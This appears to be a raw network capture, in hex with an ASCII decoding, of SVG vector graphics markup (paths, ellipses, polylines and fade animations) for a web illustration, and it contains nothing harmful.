                                                                                                                                                                              2023-09-15 05:27:44 UTC4147INData Raw: 20 64 3d 22 4d 34 38 35 2e 33 2c 34 35 2e 35 39 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 35 2e 30 38 2c 33 39 2e 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30
                                                                                                                                                                              Data Ascii: d="M485.3,45.59a1.62,1.62,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.89,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M485.08,39.1a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0
                                                                                                                                                                              2023-09-15 05:27:44 UTC4163INData Raw: 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 37 34 2c 37 37 2e 31 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 35 32 2c 37 30 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32
                                                                                                                                                                              Data Ascii: ss="cls-9" d="M512.74,77.11a1.6,1.6,0,0,1-.73,2.08,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.52,70.62a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2
                                                                                                                                                                              2023-09-15 05:27:44 UTC4179INData Raw: 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 30 2e 31 38 2c 31 30 38 2e 36 33 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 30 2c 31 30 32 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e
                                                                                                                                                                              Data Ascii: 4,2.67"/><path class="cls-9" d="M540.18,108.63a1.6,1.6,0,0,1-.73,2.08,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M540,102.14a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.
                                                                                                                                                                              2023-09-15 05:27:44 UTC4195INData Raw: 31 39 37 63 36 2e 37 35 2d 32 2e 37 31 2c 31 36 2e 31 31 2d 35 2e 36 2c 32 31 2e 37 35 2d 31 30 2e 31 33 4c 39 30 30 2e 31 36 2c 31 37 34 6c 34 2e 32 37 2d 37 2e 36 33 2c 32 2e 34 38 2d 32 38 2e 32 36 2d 32 33 2e 36 39 2c 31 34 2e 34 35 63 2d 34 2e 39 34 2c 33 2d 39 2e 38 35 2c 36 2e 31 32 2d 31 34 2e 38 34 2c 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 36 22 20 64 3d 22 4d 39 30 30 2e 31 36 2c 31 37 34 6c 34 2e 33 34 2d 35 2e 36 33 2c 32 2e 34 31 2d 33 30 2e 32 36 2d 32 33 2e 36 39 2c 31 34 2e 34 35 63 2d 34 2e 39
                                                                                                                                                                              Data Ascii: 197c6.75-2.71,16.11-5.6,21.75-10.13L900.16,174l4.27-7.63,2.48-28.26-23.69,14.45c-4.94,3-9.85,6.12-14.84,9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94Z"/><path class="cls-16" d="M900.16,174l4.34-5.63,2.41-30.26-23.69,14.45c-4.9
                                                                                                                                                                              2023-09-15 05:27:44 UTC4211INData Raw: 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 30 2c 2e 31 33 2e 37 38 2c 31 2e 39 34 2c 31 2e 39 34 2c 30 2c 30 2c 30 2c 2e 33 37 2e 36 36 2c 31 2e 37 35 2c 31 2e 37 35 2c 30 2c 30 2c 30 2c 2e 35 39 2e 34 35 2c 32 2c 32 2c 30 2c 30 2c 30 2c 31 2e 36 33 2c 30 2c 31 2e 37 35 2c 31 2e 37 35 2c 30 2c 30 2c 30 2c 2e 35 39 2d 2e 34 35 2c 31 2e 39 34 2c 31 2e 39 34 2c 30 2c 30 2c 30 2c 2e 33 37 2d 2e 36 36 41 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 30 2c 35 32 30 2e 33 34 2c 32 32 39 2e 30 35 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 35 32 34 2c 32 32 36 2e 32 32 71 30 2c 2e 32 31 2c 30 2c 2e 34 38 63 30 2c 2e 31 38 2c 30 2c 2e 33 33 2c 30 2c 2e 34 35 68 30 61 31 2e 36 36 2c 31 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 39 2d 2e 34 32 2c 32
                                                                                                                                                                              Data Ascii: 2.5,2.5,0,0,0,.13.78,1.94,1.94,0,0,0,.37.66,1.75,1.75,0,0,0,.59.45,2,2,0,0,0,1.63,0,1.75,1.75,0,0,0,.59-.45,1.94,1.94,0,0,0,.37-.66A2.5,2.5,0,0,0,520.34,229.05Z"/><path class="cls-2" d="M524,226.22q0,.21,0,.48c0,.18,0,.33,0,.45h0a1.66,1.66,0,0,1,.29-.42,2
                                                                                                                                                                              2023-09-15 05:27:44 UTC4227INData Raw: 37 32 20 36 36 33 2e 35 36 20 33 31 34 2e 32 35 20 36 37 31 2e 32 31 20 33 31 39 2e 30 32 20 36 37 30 2e 36 35 20 33 34 38 2e 39 33 22 2f 3e 3c 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 35 22 20 78 31 3d 22 36 37 31 2e 32 31 22 20 79 31 3d 22 33 32 36 2e 31 32 22 20 78 32 3d 22 36 38 38 2e 37 31 22 20 79 32 3d 22 33 32 34 2e 32 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 36 22 20 64 3d 22 4d 36 36 39 2e 31 39 2c 33 31 33 2e 33 34 76 32 63 30 2c 31 2e 33 36 2c 33 2e 32 33 2c 32 2e 34 36 2c 37 2e 32 31 2c 32 2e 34 36 73 37 2e 32 31 2d 31 2e 31 2c 37 2e 32 31 2d 32 2e 34 36 76 2d 32 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 36 37 36 2e 34 22 20 63 79 3d 22 33 31 33 2e 33 34 22
                                                                                                                                                                              Data Ascii: 72 663.56 314.25 671.21 319.02 670.65 348.93"/><line class="cls-75" x1="671.21" y1="326.12" x2="688.71" y2="324.26"/><path class="cls-76" d="M669.19,313.34v2c0,1.36,3.23,2.46,7.21,2.46s7.21-1.1,7.21-2.46v-2"/><ellipse class="cls-38" cx="676.4" cy="313.34"
                                                                                                                                                                              2023-09-15 05:27:44 UTC4243INData Raw: 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 33 2e 34 35 22 20 72 78 3d 22 31 2e 32 22 20 72 79 3d 22 31 2e 35 34 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 38 2e 39 35 20 35 36 38 2e 37 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 32 2e 32 34 22 20 72 79 3d 22 32 2e 38 38 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69
                                                                                                                                                                              Data Ascii: (-38.07)"/><ellipse class="cls-97" cx="848.64" cy="213.45" rx="1.2" ry="1.54" transform="translate(48.95 568.75) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="2.24" ry="2.88" transform="translate(45.69 569.88) rotate(-38.07)"/><elli
                                                                                                                                                                              2023-09-15 05:27:44 UTC4259INData Raw: 2e 32 39 2c 30 2c 30 2c 31 2c 2e 33 36 2d 2e 33 31 41 31 2e 36 37 2c 31 2e 36 37 2c 30 2c 30 2c 31 2c 38 31 35 2e 36 39 2c 32 35 31 2e 37 38 5a 6d 2d 2e 30 39 2d 31 2e 33 39 63 2e 34 37 2e 33 39 2e 34 39 2e 34 36 2e 34 39 2e 36 73 2d 2e 31 35 2e 34 2d 2e 33 36 2e 33 34 2d 2e 31 33 2d 2e 30 35 2d 2e 34 36 2d 2e 33 34 63 30 2d 2e 30 35 2d 2e 32 38 2d 2e 32 35 2d 2e 33 32 2d 2e 33 61 2e 33 2e 33 2c 30 2c 30 2c 31 2d 2e 30 39 2d 2e 32 33 2e 33 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 33 33 2d 2e 33 33 43 38 31 35 2e 32 36 2c 32 35 30 2e 31 34 2c 38 31 35 2e 33 34 2c 32 35 30 2e 31 38 2c 38 31 35 2e 36 2c 32 35 30 2e 33 39 5a 6d 31 2e 31 37 2e 34 36 61 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 32 33 2e 36 36 63 30 2c 2e 32 31 2d 2e 32 31 2e 32 38 2d 2e 34
                                                                                                                                                                              Data Ascii: .29,0,0,1,.36-.31A1.67,1.67,0,0,1,815.69,251.78Zm-.09-1.39c.47.39.49.46.49.6s-.15.4-.36.34-.13-.05-.46-.34c0-.05-.28-.25-.32-.3a.3.3,0,0,1-.09-.23.32.32,0,0,1,.33-.33C815.26,250.14,815.34,250.18,815.6,250.39Zm1.17.46a2.37,2.37,0,0,1,.23.66c0,.21-.21.28-.4
                                                                                                                                                                              2023-09-15 05:27:44 UTC4275INData Raw: 2e 39 31 6c 2e 31 34 2c 32 2e 32 37 61 33 2e 34 32 2c 33 2e 34 32 2c 30 2c 30 2c 30 2d 33 2e 36 31 2e 30 39 63 2d 32 2c 31 2e 32 31 2d 33 2e 32 38 2c 33 2e 37 31 2d 33 2e 37 2c 33 2e 34 37 73 2d 2e 32 33 2d 32 2e 31 32 2c 31 2e 33 39 2d 33 2e 35 31 53 39 32 32 2e 36 36 2c 32 38 34 2e 35 39 2c 39 32 35 2e 32 35 2c 32 38 34 2e 39 31 5a 22 2f 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 33 22 20 78 3d 22 39 33 30 2e 31 36 22 20 79 3d 22 32 38 35 2e 32 39 22 20 77 69 64 74 68 3d 22 33 2e 37 35 22 20 68 65 69 67 68 74 3d 22 33 2e 31 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 38 36 34 2e 30 36 20 35 37 33 2e 36 37 29 20 72 6f 74 61 74 65 28 2d 31 38 30 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31
                                                                                                                                                                              Data Ascii: .91l.14,2.27a3.42,3.42,0,0,0-3.61.09c-2,1.21-3.28,3.71-3.7,3.47s-.23-2.12,1.39-3.51S922.66,284.59,925.25,284.91Z"/><rect class="cls-113" x="930.16" y="285.29" width="3.75" height="3.1" transform="translate(1864.06 573.67) rotate(-180)"/><path class="cls-1
                                                                                                                                                                              2023-09-15 05:27:44 UTC4291INData Raw: 30 38 2d 33 2e 31 33 63 2d 31 2e 31 35 2d 34 2e 31 33 2d 35 2e 34 32 2d 34 2e 38 2d 39 2d 33 2e 36 34 2d 2e 39 2e 32 39 2d 33 2e 31 37 2c 31 2d 33 2e 34 35 2c 32 73 31 2e 31 32 2c 31 2e 36 2c 31 2e 33 33 2c 32 2e 34 37 63 2e 32 37 2c 31 2e 31 32 2d 2e 35 39 2c 32 2e 31 39 2e 33 34 2c 33 2e 32 36 61 33 2c 33 2c 30 2c 30 2c 30 2c 2e 37 36 2e 36 2c 36 2e 35 38 2c 36 2e 35 38 2c 30 2c 30 2c 30 2c 32 2e 33 35 2c 31 2e 30 37 2c 37 2e 32 38 2c 37 2e 32 38 2c 30 2c 30 2c 30 2c 32 2e 33 37 2d 2e 30 39 6c 31 2e 38 37 2d 2e 32 37 61 35 2e 32 34 2c 35 2e 32 34 2c 30 2c 30 2c 30 2c 32 2e 35 38 2d 2e 38 35 41 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 30 2c 39 30 35 2e 35 37 2c 32 35 33 2e 35 32 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 33 34 22
                                                                                                                                                                              Data Ascii: 08-3.13c-1.15-4.13-5.42-4.8-9-3.64-.9.29-3.17,1-3.45,2s1.12,1.6,1.33,2.47c.27,1.12-.59,2.19.34,3.26a3,3,0,0,0,.76.6,6.58,6.58,0,0,0,2.35,1.07,7.28,7.28,0,0,0,2.37-.09l1.87-.27a5.24,5.24,0,0,0,2.58-.85A2.91,2.91,0,0,0,905.57,253.52Z"/><path class="cls-134"
                                                                                                                                                                              2023-09-15 05:27:44 UTC4307INData Raw: 31 2c 39 31 2e 39 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 35 35 22 20 64 3d 22 4d 38 32 37 2e 35 34 2c 38 36 2e 31 63 2d 2e 31 34 2d 31 2e 36 2d 2e 37 39 2d 33 2e 37 39 2d 32 2e 38 32 2d 32 2e 36 31 41 31 2e 34 2c 31 2e 34 2c 30 2c 30 2c 30 2c 38 32 34 2c 38 35 63 30 2c 32 2e 34 33 2e 36 37 2c 34 2e 37 36 2e 36 36 2c 37 2e 32 61 31 30 2e 36 34 2c 31 30 2e 36 34 2c 30 2c 30 2c 31 2d 32 2d 2e 31 38 2c 39 2c 39 2c 30 2c 30 2c 31 2d 31 2e 31 33 2d 2e 33 31 63 2d 2e 32 32 2d 2e 30 35 2d 31 2e 32 36 2d 2e 34 35 2d 31 2e 34 35 2d 2e 33 73 2e 31 38 2e 37 2e 33 32 2e 38 39 63 2e 32 36 2e 33 37 2e 33 34 2e 34 36 2e 32 33 2e 39 61 2e 38 33 2e 38 33 2c 30 2c 30 2c 31 2d 2e 35 31 2e 36 38 63 2d 2e 31 33 2e 30 36 2d 2e 38 36 2e 32 32 2d 31 2c
                                                                                                                                                                              Data Ascii: 1,91.9Z"/><path class="cls-155" d="M827.54,86.1c-.14-1.6-.79-3.79-2.82-2.61A1.4,1.4,0,0,0,824,85c0,2.43.67,4.76.66,7.2a10.64,10.64,0,0,1-2-.18,9,9,0,0,1-1.13-.31c-.22-.05-1.26-.45-1.45-.3s.18.7.32.89c.26.37.34.46.23.9a.83.83,0,0,1-.51.68c-.13.06-.86.22-1,
                                                                                                                                                                              2023-09-15 05:27:44 UTC4323INData Raw: 31 37 2e 39 32 63 2d 2e 31 38 2c 30 2d 34 39 2e 31 32 2c 31 34 2e 31 36 2d 35 38 2e 35 37 2c 31 38 2e 36 2d 37 2e 31 33 2c 33 2e 33 35 2d 31 38 2e 37 33 2c 35 2e 34 33 2d 32 36 2c 38 2e 33 35 2d 34 2e 34 35 2d 2e 39 32 2d 32 33 2e 37 31 2d 36 2e 36 35 2d 32 36 2e 34 37 2d 39 2e 34 35 2c 30 2c 30 2d 31 33 2e 35 2d 33 2d 31 33 2e 35 2d 33 6c 2d 33 30 2e 36 39 2d 33 2e 35 37 63 2d 31 2e 32 34 2d 2e 30 38 2d 34 2d 34 2d 34 2e 38 33 2d 34 2e 39 61 34 33 2e 30 37 2c 34 33 2e 30 37 2c 30 2c 30 2c 30 2d 34 2e 31 37 2d 33 2e 39 35 63 2d 32 2e 30 36 2d 31 2e 37 36 2d 33 2e 39 34 2d 33 2e 38 2d 35 2e 38 39 2d 35 2e 36 38 6c 2d 31 30 2d 39 2e 36 34 63 2d 36 2e 33 36 2d 31 2e 35 36 2d 31 32 2e 37 36 2d 33 2d 31 39 2e 31 32 2d 34 2e 35 36 2d 34 2e 33 35 2d 31 2e 30 38
                                                                                                                                                                              Data Ascii: 17.92c-.18,0-49.12,14.16-58.57,18.6-7.13,3.35-18.73,5.43-26,8.35-4.45-.92-23.71-6.65-26.47-9.45,0,0-13.5-3-13.5-3l-30.69-3.57c-1.24-.08-4-4-4.83-4.9a43.07,43.07,0,0,0-4.17-3.95c-2.06-1.76-3.94-3.8-5.89-5.68l-10-9.64c-6.36-1.56-12.76-3-19.12-4.56-4.35-1.08
                                                                                                                                                                              2023-09-15 05:27:44 UTC4339INData Raw: 73 6c 61 74 65 28 34 37 2e 31 33 20 35 36 33 2e 32 39 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 34 30 2e 32 35 22 20 63 79 3d 22 32 31 33 2e 37 31 22 20 72 78 3d 22 30 2e 31 35 22 20 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 37 20 35 36 33 2e 36 34 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 34 30 2e 36 39 22 20 63 79 3d 22 32 31 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 35 22 20 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e
                                                                                                                                                                              Data Ascii: slate(47.13 563.29) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="840.25" cy="213.71" rx="0.15" ry="0.19" transform="translate(47 563.64) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="840.69" cy="214.09" rx="0.15" ry="0.19" transform="tran
                                                                                                                                                                              2023-09-15 05:27:44 UTC4355INData Raw: 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 39 33 20 35 35 30 2e 33 36 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 32 2e 34 38 22 20 63 79 3d 22 32 33 33 2e 36 37 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 37 38 20 35 35 30 2e 37 36 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 32 2e 39 38 22 20 63 79 3d 22 32 33 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 37 22 20
                                                                                                                                                                              Data Ascii: "0.22" transform="translate(28.93 550.36) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="812.48" cy="233.67" rx="0.17" ry="0.22" transform="translate(28.78 550.76) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="812.98" cy="234.09" rx="0.17"
                                                                                                                                                                              2023-09-15 05:27:44 UTC4371INData Raw: 34 2d 2e 35 32 2c 30 2d 31 2e 35 32 2e 31 33 2d 32 2e 30 36 2e 32 32 2d 2e 39 31 2e 37 33 2d 31 2e 37 33 2e 38 37 2d 32 2e 36 36 6c 2e 31 32 2e 30 36 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 53 56 47 2d 66 61 64 65 20 34 73 20 65 61 73 65 20 30 73 20 31 20 6e 6f 72 6d 61 6c 20 6e 6f 6e 65 20 72 75 6e 6e 69 6e 67 3b 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 20 73 76 67 2d 61 6e 69 6d 22 20 64 3d 22 4d 38 30 38 2e 38 35 2c 32 38 31 2e 37 37 61 31 2e 38 35 2c 31 2e 38 35 2c 30 2c 30 2c 31 2c 2e 31 31 2d 2e 33 31 63 2d 2e 33 31 2e 36 37 2d 31 2c 31 2d 31 2e 30 39 2c 31 2e 37 38 61 31 31 2c 31 31 2c 30 2c 30 2c 30 2d 2e 31 35 2c 31 2e 31 35 63 30 2c 2e
                                                                                                                                                                              Data Ascii: 4-.52,0-1.52.13-2.06.22-.91.73-1.73.87-2.66l.12.06" style="display: block; animation: SVG-fade 4s ease 0s 1 normal none running;"></path><path class="cls-38 svg-anim" d="M808.85,281.77a1.85,1.85,0,0,1,.11-.31c-.31.67-1,1-1.09,1.78a11,11,0,0,0-.15,1.15c0,.
                                                                                                                                                                              2023-09-15 05:27:44 UTC4387INData Raw: 20 32 30 30 2e 35 38 20 36 31 30 2e 36 34 20 32 30 36 2e 30 34 20 36 31 30 2e 38 35 20 32 31 32 2e 37 34 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 33 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 37 31 20 32 32 31 2e 31 37 20 35 39 30 2e 31 38 20 32 32 35 2e 36 36 20 35 39 38 2e 34 35 20 32 32 31 2e 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 39 2e 35 34 20 32 31 31 2e 31 32 20 35 39 32 2e 36 35 20 32 31 36 2e 32 33 20 35 39 39 2e 32 20 32 32 30 2e 32 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 37
                                                                                                                                                                              Data Ascii: 200.58 610.64 206.04 610.85 212.74"></polyline><polyline class="cls-53" points="577.71 221.17 590.18 225.66 598.45 221.7"></polyline><polyline class="cls-52" points="579.54 211.12 592.65 216.23 599.2 220.2"></polyline><polyline class="cls-52" points="577
                                                                                                                                                                              2023-09-15 05:27:44 UTC4403INData Raw: 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 53 56 47 2d 66 61 64 65 20 32 73 20 65 61 73 65 20 30 73 20 31 20 6e 6f 72 6d 61 6c 20 6e 6f 6e 65 20 72 75 6e 6e 69 6e 67 3b 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 20 73 76 67 2d 61 6e 69 6d 22 20 64 3d 22 4d 36 30 39 2e 33 33 2c 33 30 34 2e 38 39 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 30 2c 2e 32 2d 2e 32 38 63 2d 2e 34 2e 36 37 2d 2e 33 31 2c 31 2e 34 38 2d 2e 39 2c 32 61 39 2e 39 34 2c 39 2e 39 34 2c 30 2c 30 2c 31 2d 2e 39 32 2e 38 63 2d 2e 33 38 2e 32 37 2d 2e 36 35 2e 32 2d 31 2c 2e 33 33 2d 2e 37 38 2e 32 35 2d 31 2e 34 33 2c 31 2e 31 37 2d 2e 36 34 2c 31 2e 37 38 61 35 2e 31 38 2c 35 2e 31 38 2c 30 2c 30 2c 30
                                                                                                                                                                              Data Ascii: ="display: block; animation: SVG-fade 2s ease 0s 1 normal none running;"></path><path class="cls-38 svg-anim" d="M609.33,304.89a1.62,1.62,0,0,0,.2-.28c-.4.67-.31,1.48-.9,2a9.94,9.94,0,0,1-.92.8c-.38.27-.65.2-1,.33-.78.25-1.43,1.17-.64,1.78a5.18,5.18,0,0,0
                                                                                                                                                                              2023-09-15 05:27:44 UTC4419INData Raw: 30 2c 2e 34 39 73 30 2c 2e 33 35 2c 30 2c 2e 34 37 68 30 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2c 2e 37 31 2d 2e 38 31 2c 31 2e 37 36 2c 31 2e 37 36 2c 30 2c 30 2c 31 2c 31 2d 2e 33 31 2c 31 2e 38 37 2c 31 2e 38 37 2c 30 2c 30 2c 31 2c 2e 34 35 2c 30 6c 30 2c 31 61 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 30 2d 2e 35 32 2d 2e 30 36 2c 31 2e 35 34 2c 31 2e 35 34 2c 30 2c 30 2c 30 2d 2e 37 2e 31 35 2c 31 2e 34 33 2c 31 2e 34 33 2c 30 2c 30 2c 30 2d 2e 35 2e 34 31 2c 31 2e 37 37 2c 31 2e 37 37 2c 30 2c 30 2c 30 2d 2e 33 2e 35 38 2c 32 2e 36 31 2c 32 2e 36 31 2c 30 2c 30 2c 30 2d 2e 30 39 2e 36 39 76 33 68 2d 31 2e 31 33 56 37 31 2e 31 36 43 38 39 34 2e 34 39 2c 37 31 2c 38 39 34 2e 34 39 2c 37 30 2e 38 31 2c 38 39 34 2e 34 38 2c 37 30 2e 35 37 5a
                                                                                                                                                                              Data Ascii: 0,.49s0,.35,0,.47h0a1.92,1.92,0,0,1,.71-.81,1.76,1.76,0,0,1,1-.31,1.87,1.87,0,0,1,.45,0l0,1a2.12,2.12,0,0,0-.52-.06,1.54,1.54,0,0,0-.7.15,1.43,1.43,0,0,0-.5.41,1.77,1.77,0,0,0-.3.58,2.61,2.61,0,0,0-.09.69v3h-1.13V71.16C894.49,71,894.49,70.81,894.48,70.57Z
